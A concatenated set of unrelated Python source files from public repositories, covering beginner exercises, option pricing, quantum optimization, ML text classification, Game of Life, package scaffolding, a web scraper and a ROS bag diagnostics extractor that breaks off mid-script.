9254bc22775a9eb30c1625d0eb02d7bd8316bca3 | Python | RenatoGFerreira/estudos-de-python | /Desktop/Estudos_Python/exercícios/ex025.py | UTF-8 | 270 | 4.21875 | 4 | [] | no_license | '''
Crie um programa que leia o nome de uma pessoa e diga se ela tem "Silva" no nome.
'''
nome_pessoa = str(input('Qual o nome completo da pessoa? ')).strip().lower().split()
sim_ou_nao = 'silva' in nome_pessoa
print(f'Tem "Silva" no nome? [True/False] {sim_ou_nao}') | true |
684d7bb0a163ff4fa80420f4f1973b7cef1cead2 | Python | soosub/bsc-thesis | /Implementation/Zhou_2/PSO.py | UTF-8 | 853 | 2.546875 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 23 10:21:24 2020
@author: joost
"""
from QAOA import QAOA
from pyswarm import pso
import numpy as np
class PSO(QAOA):
def get_angles_PSO(G, p, backend, n_samples = 1024, maxiter = 50, debug = False):
'''
Finds angles for a given graph G using particle swarm optimization
'''
def func(x):
'''function to be optimized'''
g = x[::2]
b = x[1::2]
return -QAOA.expectation(G,g,b,backend, n_samples)
# g is the first index, b is the latter
lb = [0,0]*p
ub = [np.pi/2, np.pi/4]*p
xopt, fopt = pso(func, lb, ub, maxiter = maxiter,debug = debug)
print(fopt)
gamma = xopt[::2]
beta = xopt[1::2]
return gamma, beta
| true |
a55363850812dd61359cf64a55cc570ff0b8ed60 | Python | ngokchaoho/Kirk-s-approximation | /Spread.py | UTF-8 | 2,211 | 3.0625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Sun Nov 15 17:08:24 2020
@author: Flipped
"""
import numpy as np
from scipy.stats import norm
# Define Spread Option Class
class Spread(object):
def __init__(self, S1, S2, K, T, r, sigma1, sigma2, rho, steps, paths):
self.S1 = float(S1)
self.S2 = float(S2)
self.K = float(K)
self.T = float(T)
self.r = float(r)
self.sigma1 = float(sigma1)
self.sigma2 = float(sigma2)
self.rho = float(rho)
self.steps = int(steps)
self.paths = int(paths)
@property
def price_mc(self):
np.random.seed()
z1 =np.random.standard_normal(int(self.paths/2))
Z1 = np.concatenate((z1, -z1))
z2 =np.random.standard_normal(int(self.paths/2))
Z2 = np.concatenate((z2, -z2))
w1 = np.sqrt(self.T)*Z1
w2 = np.sqrt(self.T)*Z2
prices1 = self.S1 * np.exp((self.r -0.5*self.sigma1**2)*self.T + self.sigma1*w1)
prices2 = self.S2 * np.exp((self.r-0.5*self.sigma2**2)*self.T + self.sigma2*(self.rho*w1+np.sqrt(1-self.rho**2)*w2))
return prices1, prices2
@property
def payoff_mc(self):
pm1, pm2 = self.price_mc
payoff = np.maximum(pm1 - pm2 - self.K, 0)
return payoff
@property
def option_value(self):
payoff = self.payoff_mc
values = np.zeros(self.paths)
values = payoff * np.exp(-self.r*self.T)
value = np.mean(values)
return value
@property
def price_kirk(self):
z = self.S2 / (self.S2 + self.K*np.exp(-self.r*self.T))
sigma = np.sqrt(self.sigma1**2 + self.sigma2**2*z**2 - 2*self.rho*self.sigma1*self.sigma2*z)
d1 = (np.log(self.S1 / (self.S2 + self.K * np.exp(-self.r * self.T) ) )
/ (sigma*np.sqrt(self.T)) + 0.5*sigma*np.sqrt(self.T) )
d2 = d1 - sigma*np.sqrt(self.T)
price = self.S1*norm.cdf(d1) - (self.S2+self.K*np.exp(-self.r*self.T) )*norm.cdf(d2)
return price
spread_call = Spread(100, 90, 10, 1, 0.05, 0.2, 0.3, 0.4, 365, 100000)
print (spread_call.option_value)
print (spread_call.price_kirk)
| true |
0aba86c9aa9509f89e74008cb124a27b1678d9ec | Python | Constancellc/Demand-Model | /pecan-street/get_heatmaps.py | UTF-8 | 1,746 | 2.515625 | 3 | [] | no_license | import csv
import datetime
import matplotlib.pyplot as plt
import numpy as np
day0 = datetime.datetime(2017,5,1)
hh = {}
outfile = '../../Documents/pecan-street/heatmaps/'
ms = {0:'may17',1:'jun17',2:'jul17',3:'aug17',4:'sep17',5:'oct17',6:'nov17',
7:'dec17',8:'jan18',9:'feb18',10:'mar18',12:'apr18'}
y_ticks = ['22:00','18:00','14:00','10:00','06:00','02:00']
x_ticks = ['Jul 17','Oct 17','Jan 18','Apr 18']
for m in ms:
with open('../../Documents/pecan-street/evs-hourly/'+ms[m]+'.csv',
'rU') as csvfile:
reader = csv.reader(csvfile)
next(reader)
for row in reader:
date = datetime.datetime(int(row[0][:4]),int(row[0][5:7]),
int(row[0][8:10]))
dayNo = (date-day0).days
hour = int(row[0][11:13])
hhid = row[1]
if hhid not in hh:
hh[hhid] = {1:[],2:[]}
for t in range(24):
hh[hhid][1].append([0.0]*365)
hh[hhid][2].append([0.0]*365)
ev = float(row[2])
solar = float(row[3])
grid = float(row[4])
hh[hhid][1][23-hour][dayNo] = ev
hh[hhid][2][23-hour][dayNo] = grid+solar
for hhid in hh:
if max(max(hh[hhid][1])) < 1:
continue
plt.figure()
for f in range(1,3):
plt.subplot(2,1,f)
if f == 1:
plt.title(hhid)
plt.imshow(hh[hhid][f],vmin=0,aspect=5)
plt.yticks(np.arange(2,26,4),y_ticks)
plt.xticks([61,153,245,334],x_ticks)
plt.colorbar()
plt.tight_layout()
plt.savefig(outfile+hhid+'.pdf',format='pdf')
plt.close()
| true |
5e8e62c5e8b6d2871f32ef34e06787c41095ec2c | Python | bsfelde/PythonScripts | /ErrorLocater.py | UTF-8 | 631 | 3.25 | 3 | [] | no_license | def segmentsplitter():
#Split data by segments
with open('7114942841.txt', 'r+') as f:
for line in f:
segment = line.split('~')
return segment
def elementsplitter(segment):
#Split segments by elements, return them in a list
splitdata = [letter.split('*') for letter in segment]
return splitdata
def manFinder(data):
for segment in data:
if segment[0] == "MAN":
if len(segment[2]) != 20:
print '*'.join(segment)
#-------------------------------------
def main():
print '\n\n'
segments = segmentsplitter()
dater = elementsplitter(segments)
manFinder(dater)
if __name__ == '__main__':
main() | true |
7cdbdd716b06d212720d4c96840a2a0e8942f9eb | Python | RaoUmer/docs_classification | /docs_classification_ML_project/ml_docs_classification_2.py | UTF-8 | 13,916 | 2.578125 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 11 22:52:40 2016
@author: RaoUmer
"""
print (__doc__)
# importing required modules
import numpy as np
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
#from sklearn.feature_extraction.text import CountVectorizer
#from sklearn.feature_extraction.text import TfidfTransformer
# classifier modules
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import Perceptron
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import NearestCentroid
from sklearn.ensemble import RandomForestClassifier
from sklearn import metrics
from sklearn import svm#, datasets
from sklearn.metrics import roc_curve, auc
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import average_precision_score
from sklearn.cross_validation import train_test_split
from sklearn.preprocessing import label_binarize
from sklearn.multiclass import OneVsRestClassifier
from scipy import interp
from sklearn.grid_search import GridSearchCV
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
#from pprint import pprint
from time import time
def prepare_data(data_train, data_test):
# Converting text to vectors of numerical values using tf-idf to form feature vector
vectorizer = TfidfVectorizer()
data_train_vectors = vectorizer.fit_transform(data_train.data)
data_test_vectors = vectorizer.transform(data_test.data)
return data_train_vectors, data_test_vectors
def MNB(data_train, data_train_vectors, data_test_vectors, **kwargs):
# Implementing classification model- using MultinomialNB
clf_MNB = MultinomialNB(alpha=.01)
clf_MNB.fit(data_train_vectors, data_train.target)
y_pred = clf_MNB.predict(data_test_vectors)
return y_pred
def BNB(data_train, data_train_vectors, data_test_vectors, **kwargs):
# Implementing classification model- using BernoulliNB
clf_BNB = BernoulliNB(alpha=.01)
clf_BNB.fit(data_train_vectors, data_train.target)
y_pred = clf_BNB.predict(data_test_vectors)
return y_pred
def KNN(data_train, data_train_vectors, data_test_vectors, **kwargs):
# Implementing classification model- using KNeighborsClassifier
clf_knn = KNeighborsClassifier(n_neighbors=5)
clf_knn.fit(data_train_vectors, data_train.target)
y_pred = clf_knn.predict(data_test_vectors)
return y_pred
def NC(data_train, data_train_vectors, data_test_vectors, **kwargs):
# Implementing classification model- using NearestCentroid
clf_nc = NearestCentroid()
clf_nc.fit(data_train_vectors, data_train.target)
y_pred = clf_nc.predict(data_test_vectors)
return y_pred
def SVM(data_train, data_train_vectors, data_test_vectors, **kwargs):
# Implementing classification model- using LinearSVC
clf_svc = LinearSVC()
clf_svc.fit(data_train_vectors, data_train.target)
y_pred_score = clf_svc.decision_function(data_test_vectors)
return y_pred_score
def PERCEPTRON(data_train, data_train_vectors, data_test_vectors, **kwargs):
# Implementing classification model- using Perceptron
clf_p = Perceptron()
clf_p.fit(data_train_vectors, data_train.target)
y_pred = clf_p.predict(data_test_vectors)
return y_pred
def RF(data_train, data_train_vectors, data_test_vectors, **kwargs):
# Implementing classification model- using RandomForestClassifier
clf_rf = RandomForestClassifier()
clf_rf.fit(data_train_vectors, data_train.target)
y_pred = clf_rf.predict(data_test_vectors)
return y_pred
def SGD(data_train, data_train_vectors, data_test_vectors, **kwargs):
# Implementing classification model- using SGDClassifier
clf_sgd = SGDClassifier()
clf_sgd.fit(data_train_vectors, data_train.target)
y_pred = clf_sgd.predict(data_test_vectors)
return y_pred
def evaluation_score(data_test, y_pred, **kwargs):
avg = kwargs.pop('average','binary')
print "F1-measure:",metrics.f1_score(data_test.target, y_pred, average=avg)
print "Testing Accuracy:",metrics.accuracy_score(data_test.target,y_pred)
print "Confusion Matrix:\n",metrics.confusion_matrix(data_test.target, y_pred)
print "Sensitivity:",metrics.recall_score(data_test.target, y_pred)
print "Precision:",metrics.precision_score(data_test.target, y_pred)
return 0
def ROC_binary_class(data_test, y_pred_score):
fpr, tpr, thresholds = metrics.roc_curve(data_test.target, y_pred_score)
# print "fpr:",fpr
# print "tpr:",tpr
print"AUC-ROC Score:", metrics.roc_auc_score(data_test.target, y_pred_score)
plt.plot(fpr, tpr)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.0])
plt.title('ROC curve for classifier')
plt.xlabel('False Positive Rate (1 - Specificity)')
plt.ylabel('True Positive Rate (Sensitivity)')
plt.grid(True)
return 0
def PR_binary_class(data_test, y_pred_score):
precision, recall, _ = precision_recall_curve(data_test.target, y_pred_score)
#print"AUC-ROC Score:", metrics.roc_auc_score(data_test.target, y_pred)
plt.plot(precision, recall)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.0])
plt.title('PR curve for classifier')
plt.xlabel('Precision')
plt.ylabel('Recall')
plt.grid(True)
return 0
def ROC_multi_class(data_train, data_test, data_test_vectors):
# Binarize the output
y_train_label = label_binarize(data_train.target, classes=[0, 1, 2])
n_classes = y_train_label.shape[1]
random_state = np.random.RandomState(1)
# shuffle and split training and test sets
X_train, X_test, y_train, y_test = train_test_split(data_train_vectors, y_train_label, test_size=.5,
random_state=0)
# Learn to predict each class against the other
classifier = OneVsRestClassifier(svm.SVC(kernel='linear', probability=True, random_state=random_state))
classifier.fit(X_train, y_train)
y_pred_score = classifier.decision_function(data_test_vectors)
y_test_label = label_binarize(data_test.target, classes=[0, 1, 2])
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(y_test_label[:, i], y_pred_score[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(y_test_label.ravel(), y_pred_score.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
# Plot ROC curves for the multiclass problem
# Compute macro-average ROC curve and ROC area
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure()
# plt.plot(fpr["micro"], tpr["micro"],
# label='micro-average ROC curve (area = {0:0.2f})'
# ''.format(roc_auc["micro"]),
# linewidth=2)
#
# plt.plot(fpr["macro"], tpr["macro"],
# label='macro-average ROC curve (area = {0:0.2f})'
# ''.format(roc_auc["macro"]),
# linewidth=2)
for i in range(n_classes):
plt.plot(fpr[i], tpr[i], label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic of multi-class')
plt.legend(loc="lower right")
plt.show()
return 0
def PR_multi_class(data_train, data_test, data_test_vectors):
# Binarize the output
y_train_label = label_binarize(data_train.target, classes=[0, 1, 2])
n_classes = y_train_label.shape[1]
random_state = np.random.RandomState(0)
# shuffle and split training and test sets
X_train, X_test, y_train, y_test = train_test_split(data_train_vectors, y_train_label, test_size=.5,
random_state=random_state)
# Learn to predict each class against the other
classifier = OneVsRestClassifier(svm.SVC(kernel='linear', probability=True, random_state=random_state))
classifier.fit(X_train, y_train)
y_pred_score = classifier.decision_function(data_test_vectors)
y_test_label = label_binarize(data_test.target, classes=[0, 1, 2])
# Compute Precision-Recall and plot curve
precision = dict()
recall = dict()
average_precision = dict()
for i in range(n_classes):
precision[i], recall[i], _ = precision_recall_curve(y_test_label[:, i], y_pred_score[:, i])
average_precision[i] = average_precision_score(y_test_label[:, i], y_pred_score[:, i])
# Compute micro-average ROC curve and ROC area
precision["micro"], recall["micro"], _ = precision_recall_curve(y_test_label.ravel(), y_pred_score.ravel())
average_precision["micro"] = average_precision_score(y_test_label, y_pred_score, average="micro")
# Plot Precision-Recall curve for each class
plt.clf()
# plt.plot(recall["micro"], precision["micro"],
# label='micro-average PR curve (area = {0:0.2f})'
# ''.format(average_precision["micro"]))
for i in range(n_classes):
plt.plot(recall[i], precision[i],
label='PR curve of class {0} (area = {1:0.2f})'
''.format(i, average_precision[i]))
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title('Precision-Recall curve of multi-class')
plt.legend(loc="lower right")
plt.show()
return 0
def best_parameters_selection():
return 0
def benchmark(clf, data_train, data_test):
y_train = data_train.target
vectorizer = TfidfVectorizer()
X_train = vectorizer.fit_transform(data_train.data)
X_test = vectorizer.transform(data_test.data)
print(clf)
t0 = time()
clf.fit(X_train, y_train)
train_time = time() - t0
print("train time: %0.3fs" % train_time)
t0 = time()
clf.predict(X_test)
test_time = time() - t0
print("test time: %0.3fs" % test_time)
clf_descr = str(clf).split('(')[0]
return clf_descr, train_time, test_time
def plot_benchmark(clf, data_train, data_test):
#results = []
#results.append(benchmark(clf, data_train, data_test))
#indices = np.arange(len(results))
#results = [[x[i] for x in results] for i in range(1)]
clf_names, training_time, test_time = benchmark(clf, data_train, data_test)
training_time = np.array(training_time) / np.max(training_time)
test_time = np.array(test_time) / np.max(test_time)
plt.figure(figsize=(12, 8))
#plt.title("Score")
#plt.barh(indices, score, .2, label="score", color='r')
plt.barh( .3, training_time, .2, label="training time", color='g')
plt.barh( .6, test_time, .2, label="test time", color='b')
plt.yticks(())
plt.legend(loc='best')
plt.subplots_adjust(left=.25)
plt.subplots_adjust(top=.95)
plt.subplots_adjust(bottom=.05)
plt.text(-.3,0 ,clf_names)
plt.show()
return 0
if __name__=='__main__':
# Load some categories from the data set
categories = ['alt.atheism', 'comp.graphics']#, 'sci.space']
# Uncomment the following to do the analysis on all the categories
#categories = None
print("Loading 20 newsgroups dataset for categories:")
print(categories)
# Training data
data_train = fetch_20newsgroups(subset='train', remove=('headers', 'footers', 'quotes'), categories=categories)
print("%d Training documents" % len(data_train.filenames))
print("%d Training categories" % len(data_train.target_names))
print "\n"
# Testing data
data_test = fetch_20newsgroups(subset='test', remove=('headers', 'footers', 'quotes'), categories=categories)
print("%d Testing documents" % len(data_test.filenames))
print("%d Testing categories" % len(data_test.target_names))
print "\n"
data_train_vectors, data_test_vectors = prepare_data(data_train,data_test)
print data_train_vectors.shape,data_test_vectors.shape
y_pred_score = SVM(data_train, data_train_vectors,data_test_vectors)
#print y_pred.shape
#evaluation_score(data_test, y_pred_score)#, average='weighted')
plt.figure(121)
ROC_binary_class(data_test, y_pred_score)
plt.figure(122)
PR_binary_class(data_test, y_pred_score)
plt.figure(123)
ROC_multi_class(data_train, data_test, data_test_vectors)
plt.figure(124)
PR_multi_class(data_train, data_test, data_test_vectors)
#plot_benchmark(LinearSVC(), data_train, data_test)
#benchmark(LinearSVC(), data_train, data_test) | true |
3c4de75ed43953a08fb4e2146dfc78b2086f7351 | Python | sophialuo/CrackingTheCodingInterview_6thEdition | /16.10.py | UTF-8 | 1,295 | 4.34375 | 4 | [] | no_license | '''16.10
Living People: Given a list of people with their birth and death years, implement a method to compute the year with the most number of people alive.
You may assume that all people were born between 1900 and 2000 (inclusive). If a person was alive during any portion of that year, they should be
included in that year's count. For example, Person (birth = 1908, death = 1909) is included in the counts for both 1908 and 1909.
'''
#lst of tuples is input
def living_people(lst):
births, deaths = {}, {}
min_birth, max_death = 99999999999, -1
for tupl in lst:
birth, death = tupl
death = death+1
if birth in births:
births[birth] += 1
else:
births[birth] = 1
if death in deaths:
deaths[death] += 1
else:
deaths[death] = 1
if birth < min_birth:
min_birth = birth
if death > max_death:
max_death = death
max_alive = -1
max_year = 0
cur_alive = 0
for year in range(min_birth, max_death + 1):
if year in births:
cur_alive += births[year]
if year in deaths:
cur_alive -= deaths[year]
if cur_alive > max_alive:
max_year, max_alive = year, cur_alive
return(max_year, max_alive)
lst = [(1, 2), (2, 5), (1, 4), (3, 6), (4, 8), (5, 7), (8, 10), (9, 10), (6, 6)]
print(living_people(lst)) | true |
30f289ee68b8b7a9211284c1756ad14c60745274 | Python | alercunha/life | /game/universe.py | UTF-8 | 949 | 3.09375 | 3 | [] | no_license | from game.utils import offset_cell
class Universe:
def __init__(self, gen: list):
self.gen = gen or list()
def tick(self) -> list:
map = {}
for cell in self.gen:
map.setdefault(cell, Neighboor()).set_alive()
for step in [(-1, -1), (-1, 0), (-1, +1), (0, -1), (0, +1), (+1, -1), (+1, 0), (+1, +1)]:
adj_cell = offset_cell(cell, step)
map.setdefault(adj_cell, Neighboor()).increment()
nextgen = [
cell for cell, neighboor in map.items()
if neighboor.should_live()
]
self.gen = nextgen
return nextgen
class Neighboor:
def __init__(self):
self.count = 0
self.alive = False
def increment(self):
self.count += 1
def set_alive(self):
self.alive = True
def should_live(self):
return (self.alive and self.count == 2) or self.count == 3
| true |
b1e06f429c734cccdfdeb0b04362c599b2a24af2 | Python | nsauzede/mys | /mys/cli/subparsers/new.py | UTF-8 | 3,405 | 2.609375 | 3 | [
"MIT"
] | permissive | import getpass
import os
import re
import shutil
import subprocess
from colors import cyan
from ..utils import BULB
from ..utils import ERROR
from ..utils import MYS_DIR
from ..utils import Spinner
from ..utils import box_print
from ..utils import create_file_from_template
class BadPackageNameError(Exception):
pass
def git_config_get(item, default=None):
try:
return subprocess.check_output(['git', 'config', '--get', item],
encoding='utf-8').strip()
except Exception:
return default
def create_new_file(path, **kwargs):
create_file_from_template(path, 'new', **kwargs)
def validate_package_name(package_name):
if not re.match(r'^[a-z][a-z0-9_]*$', package_name):
raise BadPackageNameError()
def find_authors(authors):
if authors is not None:
return ', '.join([f'"{author}"' for author in authors])
user = git_config_get('user.name', getpass.getuser())
email = git_config_get('user.email', f'{user}@example.com')
return f'"{user} <{email}>"'
def do_new(_parser, args, _mys_config):
package_name = os.path.basename(args.path)
authors = find_authors(args.authors)
try:
with Spinner(text=f"Creating package {package_name}"):
validate_package_name(package_name)
os.makedirs(args.path)
path = os.getcwd()
os.chdir(args.path)
try:
create_new_file('package.toml',
package_name=package_name,
authors=authors)
create_new_file('.gitignore')
create_new_file('.gitattributes')
create_new_file('README.rst',
package_name=package_name,
title=package_name.replace('_', ' ').title(),
line='=' * len(package_name))
create_new_file('LICENSE')
shutil.copyfile(os.path.join(MYS_DIR, 'cli/templates/new/pylintrc'),
'pylintrc')
os.mkdir('src')
create_new_file('src/lib.mys')
create_new_file('src/main.mys')
finally:
os.chdir(path)
except BadPackageNameError:
box_print(['Package names must start with a letter and only',
'contain letters, numbers and underscores. Only lower',
'case letters are allowed.',
'',
'Here are a few examples:',
'',
f'{cyan("mys new foo")}'
f'{cyan("mys new f1")}'
f'{cyan("mys new foo_bar")}'],
ERROR)
raise Exception()
cd = cyan(f'cd {package_name}')
box_print(['Build and run the new package by typing:',
'',
f'{cd}',
f'{cyan("mys run")}'],
BULB,
width=53)
def add_subparser(subparsers):
subparser = subparsers.add_parser(
'new',
description='Create a new package.')
subparser.add_argument(
'--author',
dest='authors',
action='append',
help=("Package author as 'Mys Lang <mys.lang@example.com>'. May "
"be given multiple times."))
subparser.add_argument('path')
subparser.set_defaults(func=do_new)
| true |
382458bea36204ba334cd0866d3fbe2b24c553f4 | Python | TheFIUBABoys/tomy-fede-fallas-II | /InferenceEngine/rules.py | UTF-8 | 3,047 | 2.578125 | 3 | [] | no_license | from app.inference_engine.rule import Rule
__author__ = 'tomas'
def condition1(subject):
return subject['animal'] == 'dog'
def consequence1(subject):
subject['legsQuantity'] = '4'
rule1 = Rule('All dogs have 4 legs', condition1, consequence1, {'animal': 'dog'}, ('animal',))
def condition2(subject):
return subject['animal'] == 'spider'
def consequence2(subject):
subject['legsQuantity'] = '8'
rule2 = Rule('All spiders have 8 legs', condition2, consequence2, {'animal': 'spider'}, ('animal',))
def condition3(subject):
return subject['animal'] == 'ostrich'
def consequence3(subject):
subject['legsQuantity'] = '2'
rule3 = Rule('All ostriches have 2 legs', condition3, consequence3, {'animal': 'ostrich'}, ('animal',))
def condition4(subject):
return subject['legsQuantity'] == '4'
def consequence4(subject):
subject['locomotion'] = 'quadruped'
rule4 = Rule('Anything with 4 legs is a quadruped', condition4, consequence4, {'legsQuantity': '4'},
('legsQuantity',))
def condition5(subject):
return subject['legsQuantity'] == '2'
def consequence5(subject):
subject['locomotion'] = 'biped'
rule5 = Rule('Anything with 2 legs is a biped', condition5, consequence5, {'legsQuantity': '2'},
('legsQuantity',))
def condition6(subject):
return subject['legsQuantity'] == '8'
def consequence6(subject):
subject['locomotion'] = 'octoped'
rule6 = Rule('Anything with 8 legs is a octoped', condition6, consequence6, {'legsQuantity': '8'},
('legsQuantity',))
def condition7(subject):
return subject['animal'] == 'dog'
def consequence7(subject):
subject['class'] = 'mammal'
rule7 = Rule('All dogs are mammals', condition7, consequence7, {'animal': 'dog'}, ('animal',))
def condition8(subject):
return subject['animal'] == 'spider'
def consequence8(subject):
subject['class'] = 'insect'
rule8 = Rule('All spiders are insects', condition8, consequence8, {'animal': 'spider'}, ('animal',))
def condition9(subject):
return subject['animal'] == 'ostrich'
def consequence9(subject):
subject['class'] = 'bird'
rule9 = Rule('All ostriches are birds', condition9, consequence9, {'animal': 'ostrich'}, ('animal',))
def condition10(subject):
return subject['class'] == 'mammal'
def consequence10(subject):
subject['skin'] = 'hair'
rule10 = Rule('All mammal have hair', condition10, consequence10, {'class': 'mammal'}, ('class',))
def condition11(subject):
return subject['class'] == 'insect'
def consequence11(subject):
subject['skin'] = 'chitin'
rule11 = Rule('All insects have chitin', condition11, consequence11, {'class': 'insect'}, ('class',))
def condition12(subject):
return subject['class'] == 'bird'
def consequence12(subject):
subject['skin'] = 'feathers'
rule12 = Rule('All birds have feathers', condition12, consequence12, {'class': 'bird'}, ('class',))
rules = [rule1, rule2, rule3, rule4, rule5, rule6, rule7, rule8, rule9, rule10, rule11, rule12]
| true |
358900be025227f9d6880690c85a0b2ab71a19c0 | Python | kodeskolen/tekna_h19 | /bergen/dag1/volum2.py | UTF-8 | 313 | 3.625 | 4 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 13 16:51:58 2019
@author: Marie
"""
# Tar inn en radius
# Gir ut volum av kule med den radiusen
from math import pi
radius = float(input('Gi meg en radius'))
volum = (4/3)*pi*radius**3
print(f'Volumet av en kule med radius {radius} er {volum:.2f}') | true |
0aed38e10434f306fe7c4c208b0f2aa0e13a2f38 | Python | ydPro-G/seleniumDemo | /selenium/example_tag_4.py | UTF-8 | 282 | 2.9375 | 3 | [] | no_license | from selenium import webdriver
biquge = webdriver.Chrome()
biquge.get('https://www.zaobao.com/finance/china/story20200617-1061775')
elements = biquge.find_elements_by_tag_name('p') # 标签:tag # 通过tag名来选择元素
for element in elements:
print(element.text)
| true |
18c9964965c0a99029f1f23b96a8c5023045b8e2 | Python | mpenkov/crackingthecodinginterview | /chapter1/test2.py | UTF-8 | 327 | 3.140625 | 3 | [] | no_license | import unittest
from problem2 import reverse
class ReverseTest(unittest.TestCase):
def test_sanity(self):
self.assertEquals(reverse("misha"), "ahsim")
self.assertEquals(reverse("mikhail"), "liahkim")
self.assertEquals(reverse("foob"), "boof")
self.assertEquals(reverse("radar"), "radar")
| true |
26b218569455f26c6dfe7acd571febe727e32844 | Python | poojithayadavalli/codekata | /subarrays for a given array with repeated elements.py | UTF-8 | 355 | 3.609375 | 4 | [] | no_license | def sub(list1):
# store all the sublists
sublist = [[]]
# first loop
for i in range(len(list1)+1):
# second loop
for j in range(i+1,len(list1)+1):
# slice the subarray
sub = list1[i:j]
sublist.append(sub)
return sublist
x=input()
y=input().split()
print(len(sub(y))-1)
| true |
115689269a5907d66e24564a66d7d8ba62eb67f6 | Python | chenp0088/git | /numbers_3.py | UTF-8 | 95 | 3.609375 | 4 | [] | no_license | squares = []
for value in range(1,11):
square=value**2
squares.append(square)
print(squares)
| true |
83a61a1541ce41399094d3ee77cdf1a18d1ef287 | Python | derric-d/holbertonschool-higher_level_programming | /0x0B-python-input_output/7-save_to_json_file.py | UTF-8 | 208 | 2.71875 | 3 | [] | no_license | #!/usr/bin/python3
"""doc"""
from json import dumps
def save_to_json_file(my_obj, fn):
"""doc"""
with open(fn, 'w', encoding='utf-8') as file:
text = dumps(my_obj)
file.write(text)
| true |
9b26ac9ba3363826e76e91675c7ca1f1184b642b | Python | Foreverjie/newstart | /MongoTest.py | UTF-8 | 400 | 2.703125 | 3 | [] | no_license | import pymongo
client = pymongo.MongoClient(host='localhost', port=27017)
db = client.test
collection = db.students
student1 = {
'id': '20170101',
'name': 'Jordan',
'age': 20,
'gender': 'male',
}
student2 = {
'id': '20170202',
'name': 'Mike',
'age': 21,
'gender': 'male',
}
result = collection.insert_many([student1,student2])
print(result)
print(result.inserted_ids) | true |
141361713fcb261e1a0b96c77443e30b349c0212 | Python | codemy-kz/pygame_demo_1 | /test1.py | UTF-8 | 560 | 2.953125 | 3 | [] | no_license | import pygame
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
pygame.init()
screen_width = 800
screen_height = int(600 * 0.8)
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption("PyGame Test App")
FPS = 60
clock = pygame.time.Clock()
screen.fill(WHITE)
pygame.display.update()
flRunning = True
while flRunning:
for event in pygame.event.get():
if event.type == pygame.QUIT:
flRunning = False
pygame.quit()
clock.tick(FPS) | true |
be379530216c94184b6f38b5185714aeb63392bb | Python | dringakn/ROSExamples | /script/extract_rosbag_sensors.py | UTF-8 | 2,818 | 2.84375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
"""
Author: Dr. Ing. Ahmad Kamal Nasir
Email: dringakn@gmail.com
Created: 22 Mar 2023
Modified: 14 Mar 2023
Description: Extract libsensors_monitor messages from a rosbag on specified topics into a pickle file.
Example: ./extract_rosbag_sensors.py ~/filename.bag cpu_monitor_topics
Notes: Possible level of operations: OK=0, WARN=1, ERROR=2, STALE=3
"""
import os # filename, extension extraction
import argparse
import rosbag
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus, KeyValue
import pandas as pd
import numpy as np
import time
def main():
parser = argparse.ArgumentParser(description="Extract libsensors_monitor messages from a rosbag on specified topics into a pickle file.")
parser.add_argument("bag_file", help="Input ROS bag. (e.g. /path/to/filename.bag)")
parser.add_argument("--topic", help="libsensors_monitor topic.", default="/diagnostics")
args = parser.parse_args()
input_file, input_file_extension = os.path.splitext(os.path.basename(args.bag_file))
output_path = os.path.dirname(args.bag_file)
output_file = f"{output_path}/{input_file}_diagnostics.pickle"
bag = rosbag.Bag(args.bag_file, "r")
print(f"Extracting cpu_monitor data from {args.bag_file} on topic(s) {args.topic} into {output_file}")
count = 0
msgs = {'time': [], 'level': [], 'name': [], 'message': [], 'hardware_id': [], 'key': [], 'value': []}
for topic, msg, t in bag.read_messages(topics=[args.topic]):
for c in msg.status: # List of components
for item in c.values:
name = c.name.replace("/", "_").replace(" ", "_").replace(":","_")
msgs['time'].append(t.to_sec())
msgs['level'].append(c.level)
msgs['name'].append(name)
msgs['message'].append(c.message)
msgs['hardware_id'].append(c.hardware_id)
msgs['key'].append(item.key)
msgs['value'].append(item.value)
count += 1
bag.close()
print(f"Saving {count} messages as pickle file...")
df = pd.DataFrame(msgs)
df = df.pivot_table(index='time', columns=['name','key'], values='value')
df.index = pd.to_datetime(df.index.map(time.ctime))
df = df.ffill().dropna()
df.to_pickle(output_file)
# names = [col for col in df.columns for name in col if name in ['Fan Speed (RPM)', 'Temperature (C)']]
names = [col for col in df.columns for name in col if name in ['Temperature (C)']]
